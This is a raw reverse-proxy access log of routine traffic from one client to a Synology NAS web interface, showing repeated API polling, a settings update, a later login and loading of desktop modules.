"/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:52:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:52:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:02 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:13 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:51 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:53:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:03 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:03 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:12 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:54:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:18 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:32 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:55:44 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=X741WRjetYUzc&UserType=user&EIO=3&transport=websocket&sid=7FRUJXOi5MdHWhh6AAAG" [Client 84.1.26.27] [Length 6168] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:55:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.UserSettings&method=apply&version=1&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:41 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2816] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:50:41 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 84.1.26.27] [Length 708] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:42 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11856] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:46 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 69] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1769086253272&SynoToken=f2zDo5IEsPcHw&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5260] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&SynoToken=f2zDo5IEsPcHw&v=1768242326" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 109014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=f2zDo5IEsPcHw&UserType=user&EIO=3&transport=polling&t=PlbmVdr" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SynologyAccount/SynologyAccount.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1069] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=f2zDo5IEsPcHw&UserType=user&EIO=3&transport=polling&t=PlbmVeu&sid=py5VkyfUWROqviZNAAAH" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/WelcomeApp.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 21702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:53 +0000] - 200 200 - POST https nas.profibot.hu 